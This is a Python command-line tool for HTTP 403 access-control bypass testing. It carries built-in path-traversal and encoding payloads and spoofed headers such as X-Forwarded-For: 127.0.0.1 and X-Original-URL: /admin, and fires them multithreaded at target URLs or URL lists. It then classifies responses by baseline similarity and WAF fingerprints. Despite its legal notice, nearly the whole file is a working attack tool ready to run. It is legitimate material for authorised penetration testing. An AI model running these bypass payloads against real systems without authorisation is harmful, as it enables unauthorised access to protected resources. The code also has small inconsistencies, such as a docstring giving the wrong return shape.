#!/usr/bin/env python3
"""
================================================================================
403 Bypass — Professional HTTP 403 Access Control Bypass Testing Tool
================================================================================
Author : Nithin Kumar DA
Purpose: Identify and validate HTTP 403 access control misconfigurations using
         URL manipulation and header injection techniques, with strong
         false-positive reduction (baseline comparison, WAF detection,
         content similarity analysis).

LEGAL NOTICE:
    Use only on systems you own or have explicit written authorization to
    test. Unauthorized access testing is illegal in most jurisdictions.
================================================================================
"""

import os
import sys
import time
import json
import hashlib
import difflib
import argparse
import threading
import concurrent.futures
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import urlparse
from typing import Optional

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from urllib3.exceptions import InsecureRequestWarning

from bs4 import BeautifulSoup
from tqdm import tqdm
from colorama import Fore, Style, init as colorama_init

from rich.console import Console
from rich.table import Table
from rich.panel import Panel

# ──────────────────────────────────────────────────────────────────────────
# Initialization
# ──────────────────────────────────────────────────────────────────────────
colorama_init(autoreset=True)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
console = Console()

VERSION = "3.0.0"
TOOL_NAME = "403 Bypass"

# ──────────────────────────────────────────────────────────────────────────
# Constants / Defaults
# ──────────────────────────────────────────────────────────────────────────
DEFAULT_TIMEOUT = 10.0
DEFAULT_THREADS = 10
DEFAULT_DELAY = 0.1
SIMILARITY_THRESHOLD = 0.90          # below this = "differs significantly"
BYPASS_STATUS_CODES = {200, 204, 206, 302}
ORIGINAL_STATUS = 403

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
]

# WAF / block-page fingerprints: (Vendor, [indicator strings])
WAF_SIGNATURES = {
    "Cloudflare": ["attention required", "just a moment...", "checking your browser", "cf-ray"],
    "Akamai":     ["access denied", "akamai", "reference #"],
    "Imperva":    ["incapsula incident id", "incident id", "imperva"],
    "Sucuri":     ["access denied - sucuri website firewall", "sucuri website firewall"],
    "F5":         ["request rejected", "the requested url was rejected"],
    "ModSecurity":["modsecurity action", "mod_security", "this error was generated by mod_security"],
    "AWS WAF":    ["request blocked", "aws waf"],
}

DEFAULT_URL_PAYLOADS = [
    "%2e", "%2f", "%20", "%09", "//", "/*", "/./", "/.%2f", "/%2f/", "/.;/",
    "/;/", "/?", "/#", "/%20/", "/%09/", "/..", "/../", "/..;/", "/..%2f",
    "/%2e%2e/", "/..%252f", "/%ef%bc%8f", "/%c0%af", "/%e0%80%af", "..%2f",
    "..;/", ";/", "./", "%2e/", "/.",
]

DEFAULT_HEADER_PAYLOADS = [
    "X-Forwarded-For: 127.0.0.1",
    "X-Forwarded-For: localhost",
    "X-Forwarded-Host: 127.0.0.1",
    "X-Real-IP: 127.0.0.1",
    "X-Originating-IP: 127.0.0.1",
    "X-Remote-IP: 127.0.0.1",
    "X-Remote-Addr: 127.0.0.1",
    "X-Client-IP: 127.0.0.1",
    "X-Host: 127.0.0.1",
    "X-Custom-IP-Authorization: 127.0.0.1",
    "X-Original-URL: /admin",
    "X-Rewrite-URL: /admin",
    "X-Override-URL: /admin",
    "Forwarded: for=127.0.0.1",
    "Client-IP: 127.0.0.1",
    "True-Client-IP: 127.0.0.1",
    "CF-Connecting-IP: 127.0.0.1",
    "Referer: https://google.com",
]

# ──────────────────────────────────────────────────────────────────────────
# Data structures
# ──────────────────────────────────────────────────────────────────────────
@dataclass
class Baseline:
    status_code: int
    content_length: int
    title: str
    body_hash: str
    body_text: str


@dataclass
class TestResult:
    url: str
    payload: str = ""
    header: str = ""
    status_code: Optional[int] = None
    content_length: int = 0
    title: str = ""
    classification: str = ""   # BYPASS / WAF_BLOCK / FALSE_POSITIVE / ORIGINAL / ERROR
    waf_vendor: str = ""
    similarity: float = 0.0


@dataclass
class Stats:
    total_requests: int = 0
    bypasses: int = 0
    waf_blocks: int = 0
    false_positives: int = 0
    redirects: int = 0
    possible_differences: int = 0
    errors: int = 0
    lock: threading.Lock = field(default_factory=threading.Lock)

    def incr(self, field_name: str):
        with self.lock:
            setattr(self, field_name, getattr(self, field_name) + 1)


# ──────────────────────────────────────────────────────────────────────────
# Banner
# ──────────────────────────────────────────────────────────────────────────
def print_banner():
    banner = r"""
██╗  ██╗ ██████╗ ██████╗       ██████╗ ██╗   ██╗██████╗  █████╗ ███████╗███████╗
██║  ██║██╔═████╗╚════██╗      ██╔══██╗╚██╗ ██╔╝██╔══██╗██╔══██╗██╔════╝██╔════╝
███████║██║██╔██║ █████╔╝█████╗██████╔╝ ╚████╔╝ ██████╔╝███████║███████╗███████╗
╚════██║████╔╝██║ ╚═══██╗╚════╝██╔══██╗  ╚██╔╝  ██╔═══╝ ██╔══██║╚════██║╚════██║
     ██║╚██████╔╝██████╔╝      ██████╔╝   ██║   ██║     ██║  ██║███████║███████║
     ╚═╝ ╚═════╝ ╚═════╝       ╚═════╝    ╚═╝   ╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝
                                                                                
"""
    console.print(f"[bold cyan]{banner}[/bold cyan]")
    console.print(f"[bold magenta]{''.center(80)}[/bold magenta]")
    console.print(f"[yellow]{f'v{VERSION}  —  Accuracy-first 403 bypass testing'.center(80)}[/yellow]")
    console.print(f"[red]{'⚠  Use only on systems you have explicit permission to test.'.center(80)}[/red]")
    console.print("[blue]" + "═" * 80 + "[/blue]\n")


# ──────────────────────────────────────────────────────────────────────────
# Logging helpers (thread-safe)
# ──────────────────────────────────────────────────────────────────────────
print_lock = threading.Lock()

def log(msg: str, style: str = ""):
    with print_lock:
        if style:
            console.print(msg, style=style)
        else:
            console.print(msg)


CLASSIFICATION_STYLES = {
    "ORIGINAL":        ("[403] ORIGINAL", "white"),
    "BYPASS":          ("[BYPASS] POSSIBLE", "bold green"),
    "WAF_BLOCK":       ("[WAF BLOCK]", "bold magenta"),
    "FALSE_POSITIVE":  ("[FALSE POSITIVE]", "yellow"),
    "ERROR":           ("[ERROR]", "red"),
}


def print_result_line(result: TestResult):
    label, style = CLASSIFICATION_STYLES.get(result.classification, ("[UNKNOWN]", "white"))
    mapped = map_classification_to_label(result)
    detail = f"payload='{result.payload}'" if result.payload else f"header='{result.header}'"
    extra = f" | WAF: {result.waf_vendor}" if result.waf_vendor else ""
    log(
        f"  [{style}]{label}[/{style}]  {result.url}  "
        f"({detail}) → HTTP {result.status_code}, len={result.content_length}, "
        f"sim={result.similarity:.0%} | {mapped}{extra}"
    )


def map_classification_to_label(result: TestResult) -> str:
    """Map internal classification to user-facing labels requested."""
    if result.classification == "ORIGINAL":
        return "NO CHANGE"
    if result.classification == "WAF_BLOCK":
        return "WAF BLOCK"
    if result.classification == "FALSE_POSITIVE":
        return "FALSE POSITIVE"
    if result.classification == "BYPASS":
        # Use similarity to distinguish HIGH_CONFIDENCE / POSSIBLE
        if result.similarity >= 0.85:
            return "HIGH CONFIDENCE"
        if result.similarity >= 0.55:
            return "POSSIBLE DIFFERENCE"
        return "POSSIBLE DIFFERENCE"
    return "UNKNOWN"


def save_json_result(result: TestResult, json_path: str):
    """Append a single JSON object (line-delimited) describing the finding."""
    obj = {
        "url": result.url,
        "status": result.status_code,
        "title": result.title,
        "length": result.content_length,
        "similarity": round(result.similarity, 4),
        "classification": map_classification_to_label(result),
    }
    try:
        with open(json_path, "a", encoding="utf-8") as f:
            f.write(json.dumps(obj, ensure_ascii=False) + "\n")
    except Exception as e:
        log(f"[red][-] Failed to write JSON result: {e}[/red]")


# ──────────────────────────────────────────────────────────────────────────
# Session creation with retry / backoff
# ──────────────────────────────────────────────────────────────────────────
def create_session(ua_index: int = 0) -> requests.Session:
    """
    Create a requests.Session with:
      - Connection reuse (pooling)
      - Exponential backoff retry ONLY on transient errors (429, 502, 503, 504)
      - 500 is intentionally excluded — it should be recorded, not retried,
        to avoid hanging on servers that always 500 for malformed payloads.
    """
    session = requests.Session()
    retry_strategy = Retry(
        total=3,
        connect=2,
        read=2,
        backoff_factor=0.5,                       # 0.5, 1, 2 seconds...
        status_forcelist=(429, 502, 503, 504),
        allowed_methods=frozenset(["GET", "POST", "HEAD", "OPTIONS"]),
        raise_on_status=False,
    )
    adapter = HTTPAdapter(max_retries=retry_strategy, pool_connections=20, pool_maxsize=20)
    session.mount("http://", adapter)
    session.mount("https://", adapter)
    session.headers.update({
        "User-Agent": USER_AGENTS[ua_index % len(USER_AGENTS)],
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "keep-alive",
    })
    return session


# ──────────────────────────────────────────────────────────────────────────
# Payload / header loaders
# ──────────────────────────────────────────────────────────────────────────
def load_payloads(file_path: str, fallback: list) -> list:
    """
    Load URL path payloads from file. Falls back to built-in defaults
    if the file is missing or empty.
    """
    if os.path.isfile(file_path):
        try:
            with open(file_path, "r", encoding="utf-8", errors="ignore") as f:
                lines = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")]
            if lines:
                return lines
        except Exception as e:
            log(f"[yellow][!] Could not read {file_path}: {e}[/yellow]")
    return fallback


def load_headers(file_path: str, fallback: list) -> list:
    """
    Load header payloads from file as 'Header: Value' lines and parse
    them into (name, value) tuples. Falls back to built-in defaults.
    """
    raw_lines = fallback
    if os.path.isfile(file_path):
        try:
            with open(file_path, "r", encoding="utf-8", errors="ignore") as f:
                lines = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")]
            if lines:
                raw_lines = lines
        except Exception as e:
            log(f"[yellow][!] Could not read {file_path}: {e}[/yellow]")

    parsed = []
    for line in raw_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            parsed.append((name.strip(), value.strip()))
    return parsed


# ──────────────────────────────────────────────────────────────────────────
# URL helpers
# ──────────────────────────────────────────────────────────────────────────
def normalize_url(url: str) -> str:
    if not url:
        return url
    parsed = urlparse(url)
    if not parsed.scheme:
        return "http://" + url
    return url


def build_payload_url(base_url: str, payload: str) -> str:
    """Build a test URL from a base URL and a path-manipulation payload."""
    if payload.startswith(("http://", "https://")):
        return payload
    if payload.startswith(("?", "#")):
        return base_url.rstrip("/") + payload
    return f"{base_url.rstrip('/')}/{payload.lstrip('/')}"


# ──────────────────────────────────────────────────────────────────────────
# Response analysis helpers
# ──────────────────────────────────────────────────────────────────────────
def extract_title(html_text: str) -> str:
    """Extract <title> using BeautifulSoup. Returns '' if not found."""
    try:
        soup = BeautifulSoup(html_text, "html.parser")
        if soup.title and soup.title.string:
            return soup.title.string.strip()
    except Exception:
        pass
    return ""


def hash_body(body_bytes: bytes) -> str:
    return hashlib.sha256(body_bytes).hexdigest()


def detect_waf(body_text: str, headers: dict) -> str:
    """
    Detect known WAF / block-page fingerprints in response body or headers.
    Returns the vendor name if matched, else ''.
    """
    lowered_body = (body_text or "").lower()
    lowered_headers = " ".join(f"{k}:{v}" for k, v in headers.items()).lower()
    haystack = lowered_body + " " + lowered_headers

    for vendor, indicators in WAF_SIGNATURES.items():
        for indicator in indicators:
            if indicator in haystack:
                return vendor
    return ""


def compare_response(baseline: Baseline, candidate_text: str, candidate_len: int,
                      candidate_title: str, candidate_hash: str) -> float:
    """
    Compare candidate response to the baseline 403 response using
    difflib.SequenceMatcher. Returns a similarity ratio (0.0 - 1.0).
    A ratio close to 1.0 means the response is essentially identical
    to the original 403 page (likely false positive / custom error page
    served with a different status, or a soft-403).
    """
    if candidate_hash == baseline.body_hash:
        return 1.0
    matcher = difflib.SequenceMatcher(None, baseline.body_text, candidate_text)
    return matcher.ratio()


# ──────────────────────────────────────────────────────────────────────────
# Core request wrapper
# ──────────────────────────────────────────────────────────────────────────
def safe_request(session: requests.Session, url: str, headers: dict = None,
                  timeout: float = DEFAULT_TIMEOUT, verify: bool = False,
                  delay: float = DEFAULT_DELAY):
    """
    Perform a GET request safely. Never raises — returns a tuple:
        (status_code:int|None, body_text:str, content_length:int, resp_headers:dict, error:str|None)
    """
    try:
        if delay > 0:
            time.sleep(delay)
        resp = session.get(url, headers=headers or {}, timeout=timeout,
                            verify=verify, allow_redirects=True)
        body_text = resp.text
        # build redirect chain
        redirect_chain = [h.headers.get('Location') or getattr(h, 'url', '') for h in resp.history]
        return resp.status_code, body_text, len(resp.content), dict(resp.headers), redirect_chain, None
    except requests.exceptions.Timeout:
        return None, "", 0, {}, [], "TIMEOUT"
    except requests.exceptions.ConnectionError as e:
        return None, "", 0, {}, [], "CONNECTION_ERROR"
    except requests.exceptions.RequestException as e:
        return None, "", 0, {}, [], f"REQUEST_ERROR: {e}"
    except Exception as e:
        return None, "", 0, {}, [], f"UNKNOWN_ERROR: {e}"


# ──────────────────────────────────────────────────────────────────────────
# Baseline request
# ──────────────────────────────────────────────────────────────────────────
def baseline_request(session: requests.Session, url: str, timeout: float,
                      verify: bool, delay: float) -> Optional[Baseline]:
    """
    Send an unmodified request to the target to capture the original
    403 response fingerprint: status, length, title, and SHA256 hash.
    This baseline is later used to detect false positives (e.g. a WAF
    page returned with a 200 status that is functionally identical to
    the original 403 block page).
    """
    status, body_text, length, headers, redirect_chain, error = safe_request(
        session, url, timeout=timeout, verify=verify, delay=delay
    )
    if error or status is None:
        log(f"[red][-] Baseline request failed for {url}: {error}[/red]")
        return None

    title = extract_title(body_text)
    body_hash = hash_body(body_text.encode("utf-8", errors="ignore"))

    log(
        f"[cyan][i] Baseline → {url}  status={status}  len={length}  "
        f"title='{title[:40]}'  sha256={body_hash[:12]}...[/cyan]"
    )
    return Baseline(status_code=status, content_length=length, title=title,
                     body_hash=body_hash, body_text=body_text)


# ──────────────────────────────────────────────────────────────────────────
# Classification logic
# ──────────────────────────────────────────────────────────────────────────
def classify_response(baseline: Baseline, status: int, body_text: str,
                       length: int, title: str, headers: dict) -> tuple:
    """
    Classify a test response relative to the baseline.
    Returns (classification:str, waf_vendor:str, similarity:float)

    Classification logic:
      1. If status code is still 403 (or unchanged from baseline) -> ORIGINAL
      2. If status is in BYPASS_STATUS_CODES:
           a. Check for WAF block-page fingerprints -> WAF_BLOCK if matched
              even though status looks successful.
           b. Compute SHA256 + similarity ratio vs baseline.
              - If hash matches baseline OR similarity >= threshold AND
                content length/title are essentially unchanged -> FALSE_POSITIVE
              - Else -> BYPASS (real difference detected)
      3. Anything else (4xx/5xx other than 403) -> treated as ORIGINAL-class
         (not a bypass, not worth reporting as WAF block).
    """
    body_hash = hash_body(body_text.encode("utf-8", errors="ignore"))
    similarity = compare_response(baseline, body_text, length, title, body_hash)

    # Case 1: status unchanged from baseline / still blocked
    if status == baseline.status_code:
        return "ORIGINAL", "", similarity

    # Case 2: status looks like a potential bypass
    if status in BYPASS_STATUS_CODES:
        waf_vendor = detect_waf(body_text, headers)
        if waf_vendor:
            return "WAF_BLOCK", waf_vendor, similarity

        content_len_diff = abs(length - baseline.content_length)
        title_diff = (title.strip() != baseline.title.strip())
        length_diff_significant = (
            baseline.content_length == 0 or
            content_len_diff / max(baseline.content_length, 1) > 0.05
        )

        # If everything is nearly identical to baseline -> false positive
        if (similarity >= SIMILARITY_THRESHOLD
                and not length_diff_significant
                and not title_diff):
            return "FALSE_POSITIVE", "", similarity

        # Genuine difference detected -> real bypass
        return "BYPASS", "", similarity

    # Anything else (other 4xx/5xx) — not a bypass, not the original 403
    return "ORIGINAL", "", similarity


# ──────────────────────────────────────────────────────────────────────────
# Test functions
# ──────────────────────────────────────────────────────────────────────────
def test_url_payload(session: requests.Session, base_url: str, payload: str,
                      baseline: Baseline, timeout: float, verify: bool,
                      delay: float, stats: Stats) -> TestResult:
    """Test a single URL path-manipulation payload against the target."""
    test_url = build_payload_url(base_url, payload)
    status, body_text, length, headers, redirect_chain, error = safe_request(
        session, test_url, timeout=timeout, verify=verify, delay=delay
    )
    stats.incr("total_requests")

    if redirect_chain:
        stats.incr("redirects")

    if error or status is None:
        stats.incr("errors")
        return TestResult(url=test_url, payload=payload, status_code=None,
                           classification="ERROR")

    title = extract_title(body_text)
    classification, waf_vendor, similarity = classify_response(
        baseline, status, body_text, length, title, headers
    )

    result = TestResult(
        url=test_url, payload=payload, status_code=status,
        content_length=length, title=title, classification=classification,
        waf_vendor=waf_vendor, similarity=similarity,
    )

    if classification == "BYPASS":
        stats.incr("bypasses")
    elif classification == "WAF_BLOCK":
        stats.incr("waf_blocks")
    elif classification == "FALSE_POSITIVE":
        stats.incr("false_positives")

    return result


def test_header_payload(session: requests.Session, base_url: str,
                         header_name: str, header_value: str,
                         baseline: Baseline, timeout: float, verify: bool,
                         delay: float, stats: Stats) -> TestResult:
    """Test a single header-injection payload against the target."""
    status, body_text, length, headers, redirect_chain, error = safe_request(
        session, base_url, headers={header_name: header_value},
        timeout=timeout, verify=verify, delay=delay
    )
    stats.incr("total_requests")

    if redirect_chain:
        stats.incr("redirects")

    if error or status is None:
        stats.incr("errors")
        return TestResult(url=base_url, header=f"{header_name}: {header_value}",
                           status_code=None, classification="ERROR")

    title = extract_title(body_text)
    classification, waf_vendor, similarity = classify_response(
        baseline, status, body_text, length, title, headers
    )

    result = TestResult(
        url=base_url, header=f"{header_name}: {header_value}",
        status_code=status, content_length=length, title=title,
        classification=classification, waf_vendor=waf_vendor, similarity=similarity,
    )

    if classification == "BYPASS":
        stats.incr("bypasses")
    elif classification == "WAF_BLOCK":
        stats.incr("waf_blocks")
    elif classification == "FALSE_POSITIVE":
        stats.incr("false_positives")

    return result


def test_combination(session: requests.Session, base_url: str, payload: str,
                      header_name: str, header_value: str, baseline: Baseline,
                      timeout: float, verify: bool, delay: float,
                      stats: Stats) -> TestResult:
    """Test a combination of URL payload + header payload together."""
    test_url = build_payload_url(base_url, payload)
    status, body_text, length, headers, redirect_chain, error = safe_request(
        session, test_url, headers={header_name: header_value},
        timeout=timeout, verify=verify, delay=delay
    )
    stats.incr("total_requests")

    if redirect_chain:
        stats.incr("redirects")

    if error or status is None:
        stats.incr("errors")
        return TestResult(url=test_url, payload=payload,
                           header=f"{header_name}: {header_value}",
                           status_code=None, classification="ERROR")

    title = extract_title(body_text)
    classification, waf_vendor, similarity = classify_response(
        baseline, status, body_text, length, title, headers
    )

    result = TestResult(
        url=test_url, payload=payload, header=f"{header_name}: {header_value}",
        status_code=status, content_length=length, title=title,
        classification=classification, waf_vendor=waf_vendor, similarity=similarity,
    )

    if classification == "BYPASS":
        stats.incr("bypasses")
    elif classification == "WAF_BLOCK":
        stats.incr("waf_blocks")
    elif classification == "FALSE_POSITIVE":
        stats.incr("false_positives")

    return result


# ──────────────────────────────────────────────────────────────────────────
# Result saving
# ──────────────────────────────────────────────────────────────────────────
def save_result(result: TestResult, output_path: str):
    """
    Append a single successful (BYPASS) finding to results.txt in the
    required format:
        URL
        Payload
        Header
        Status
        Content-Length
        Title
    """
    try:
        with open(output_path, "a", encoding="utf-8") as f:
            f.write(f"URL: {result.url}\n")
            f.write(f"Payload: {result.payload or '-'}\n")
            f.write(f"Header: {result.header or '-'}\n")
            f.write(f"Status: {result.status_code}\n")
            f.write(f"Content-Length: {result.content_length}\n")
            f.write(f"Title: {result.title or '-'}\n")
            f.write("-" * 60 + "\n")
    except Exception as e:
        log(f"[red][-] Failed to write result: {e}[/red]")


# ──────────────────────────────────────────────────────────────────────────
# Statistics table
# ──────────────────────────────────────────────────────────────────────────
def print_statistics(stats: Stats, elapsed: float):
    table = Table(title=f"Scan Statistics  ({elapsed:.1f}s elapsed)", show_lines=False)
    table.add_column("Metric", style="cyan", no_wrap=True)
    table.add_column("Count", style="bold white")

    table.add_row("Total Requests", str(stats.total_requests))
    table.add_row("Bypasses Found", f"[bold green]{stats.bypasses}[/bold green]")
    table.add_row("WAF Blocks", f"[magenta]{stats.waf_blocks}[/magenta]")
    table.add_row("False Positives Filtered", f"[yellow]{stats.false_positives}[/yellow]")
    table.add_row("Possible Differences", f"[cyan]{stats.possible_differences}[/cyan]")
    table.add_row("Redirects observed", f"[white]{stats.redirects}[/white]")
    table.add_row("Errors", f"[red]{stats.errors}[/red]")

    console.print()
    console.print(table)
    console.print()


# ──────────────────────────────────────────────────────────────────────────
# Per-target orchestration
# ──────────────────────────────────────────────────────────────────────────
def scan_target(target_url: str, url_payloads: list, header_pairs: list,
                 args, stats: Stats, output_path: str, ua_index: int):
    target_url = normalize_url(target_url)
    session = create_session(ua_index=ua_index)

    console.print(Panel(f"[bold white]{target_url}[/bold white]", title="Target", style="cyan"))

    baseline = baseline_request(session, target_url, args.timeout, not args.no_verify, args.delay)
    if baseline is None:
        log(f"[red][-] Skipping target — baseline failed: {target_url}[/red]")
        return

    if baseline.status_code != ORIGINAL_STATUS:
        log(
            f"[yellow][!] Note: baseline status is {baseline.status_code}, not 403. "
            f"Bypass detection will still run, but this target may not be 403-protected.[/yellow]"
        )

    findings = []
    jobs = []

    # Build job list: URL-only, header-only, and combination (if enabled)
    if not args.no_url:
        for payload in url_payloads:
            jobs.append(("url", payload, None, None))
    if not args.no_headers:
        for h_name, h_val in header_pairs:
            jobs.append(("header", None, h_name, h_val))
    if args.combine:
        for payload in url_payloads:
            for h_name, h_val in header_pairs:
                jobs.append(("combo", payload, h_name, h_val))

    def run_job(job):
        kind, payload, h_name, h_val = job
        if kind == "url":
            return test_url_payload(session, target_url, payload, baseline,
                                      args.timeout, not args.no_verify, args.delay, stats)
        elif kind == "header":
            return test_header_payload(session, target_url, h_name, h_val, baseline,
                                         args.timeout, not args.no_verify, args.delay, stats)
        else:
            return test_combination(session, target_url, payload, h_name, h_val,
                                      baseline, args.timeout, not args.no_verify,
                                      args.delay, stats)

    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = [executor.submit(run_job, job) for job in jobs]
        for future in tqdm(concurrent.futures.as_completed(futures), total=len(futures),
                            desc=f"Testing {urlparse(target_url).netloc}", unit="req",
                            colour="green", leave=False):
            result = future.result()
            if result.classification in ("BYPASS", "WAF_BLOCK"):
                print_result_line(result)
            if result.classification == "BYPASS":
                findings.append(result)
                save_result(result, output_path)

    if findings:
        log(f"[bold green][+] {len(findings)} bypass(es) confirmed for {target_url}[/bold green]")
    else:
        log(f"[white][-] No confirmed bypasses for {target_url}[/white]")
    return findings


# ──────────────────────────────────────────────────────────────────────────
# Argument parsing
# ──────────────────────────────────────────────────────────────────────────
def parse_args():
    parser = argparse.ArgumentParser(
        description=f"{TOOL_NAME} v{VERSION} — Accuracy-first HTTP 403 bypass tester",
        formatter_class=argparse.RawTextHelpFormatter,
    )
    target_group = parser.add_mutually_exclusive_group()
    target_group.add_argument("-u", "--url", help="Single target URL")
    target_group.add_argument("-l", "--list", help="File containing target URLs (one per line)")

    parser.add_argument("-p", "--payloads", default="403_url_payloads.txt",
                         help="URL payload file (default: 403_url_payloads.txt)")
    parser.add_argument("--headers-file", default="403_header_payloads.txt",
                         help="Header payload file (default: 403_header_payloads.txt)")
    parser.add_argument("-o", "--output", default="results.txt",
                         help="Output file for confirmed bypasses (default: results.txt)")
    parser.add_argument("-t", "--threads", type=int, default=DEFAULT_THREADS,
                         help=f"Number of threads (default: {DEFAULT_THREADS})")
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT,
                         help=f"Request timeout in seconds (default: {DEFAULT_TIMEOUT})")
    parser.add_argument("--delay", type=float, default=DEFAULT_DELAY,
                         help=f"Delay between requests in seconds (default: {DEFAULT_DELAY})")
    parser.add_argument("--no-verify", action="store_true",
                         help="Disable SSL certificate verification")
    parser.add_argument("--no-url", action="store_true", help="Skip URL payload tests")
    parser.add_argument("--no-headers", action="store_true", help="Skip header payload tests")
    parser.add_argument("--combine", action="store_true",
                         help="Also test URL payload + header payload combinations (slower)")

    return parser.parse_args()


# ──────────────────────────────────────────────────────────────────────────
# Main
# ──────────────────────────────────────────────────────────────────────────
def main():
    print_banner()
    args = parse_args()

    # ── Resolve targets ──
    targets = []
    if args.url:
        targets = [args.url]
    elif args.list:
        if not os.path.isfile(args.list):
            log(f"[red][-] List file not found: {args.list}[/red]")
            sys.exit(1)
        with open(args.list, "r", encoding="utf-8", errors="ignore") as f:
            targets = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")]
        if not targets:
            log(f"[red][-] No URLs found in {args.list}[/red]")
            sys.exit(1)
    else:
        console.print("[cyan][1][/cyan] Single URL")
        console.print("[cyan][2][/cyan] URL List")
        choice = input(f"{Fore.CYAN}Select mode: {Style.RESET_ALL}").strip()

        if choice == "1":
            raw = input(f"{Fore.CYAN}Target URL: {Style.RESET_ALL}").strip()
            if not raw:
                log("[red][-] No URL provided. Exiting.[/red]")
                sys.exit(1)
            targets = [raw]
        elif choice == "2":
            fpath = input(f"{Fore.CYAN}Path to URL list file: {Style.RESET_ALL}").strip()
            if not os.path.isfile(fpath):
                log(f"[red][-] File not found: {fpath}[/red]")
                sys.exit(1)
            with open(fpath, "r", encoding="utf-8", errors="ignore") as f:
                targets = [l.strip() for l in f if l.strip() and not l.strip().startswith("#")]
        else:
            log("[red][-] Invalid choice. Exiting.[/red]")
            sys.exit(1)

    # ── Load payloads ──
    url_payloads = load_payloads(args.payloads, DEFAULT_URL_PAYLOADS)
    header_pairs = load_headers(args.headers_file, DEFAULT_HEADER_PAYLOADS)

    log(f"[cyan][i] Targets         : {len(targets)}[/cyan]")
    log(f"[cyan][i] URL payloads    : {len(url_payloads)}[/cyan]")
    log(f"[cyan][i] Header payloads : {len(header_pairs)}[/cyan]")
    log(f"[cyan][i] Threads         : {args.threads}[/cyan]")
    log(f"[cyan][i] Combine mode    : {args.combine}[/cyan]")
    log(f"[cyan][i] Output file     : {args.output}\n[/cyan]")

    # Initialize/clear output file with header note
    try:
        with open(args.output, "a", encoding="utf-8") as f:
            f.write(f"\n# Scan started {datetime.now().isoformat()}\n")
    except Exception as e:
        log(f"[red][-] Cannot write to {args.output}: {e}[/red]")
        sys.exit(1)

    stats = Stats()
    start_time = time.time()
    all_findings = []

    # Initialize/clear results.json
    try:
        with open("results.json", "w", encoding="utf-8") as jf:
            jf.write("")
    except Exception:
        pass

    for i, target in enumerate(targets):
        try:
            findings = scan_target(target, url_payloads, header_pairs, args, stats, args.output, ua_index=i)
            if findings:
                for r in findings:
                    save_json_result(r, "results.json")
                all_findings.extend(findings)
        except KeyboardInterrupt:
            log("[yellow][!] Interrupted by user.[/yellow]")
            break
        except Exception as e:
            log(f"[red][-] Unexpected error scanning {target}: {e}[/red]")
            stats.incr("errors")

    elapsed = time.time() - start_time
    print_statistics(stats, elapsed)
    log(f"[green][✔] Confirmed bypasses saved to: {args.output} and results.json[/green]")

    # Print final results table
    if all_findings:
        table = Table(title="Findings", show_lines=False)
        table.add_column("URL", overflow="fold")
        table.add_column("Code", style="white")
        table.add_column("Similarity", style="cyan")
        table.add_column("Classification", style="magenta")

        for r in all_findings:
            table.add_row(r.url, str(r.status_code or "-"), f"{r.similarity:.0%}", map_classification_to_label(r))

        console.print(table)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        console.print("\n[yellow][!] Scan interrupted by user. Exiting.[/yellow]")
        sys.exit(130)
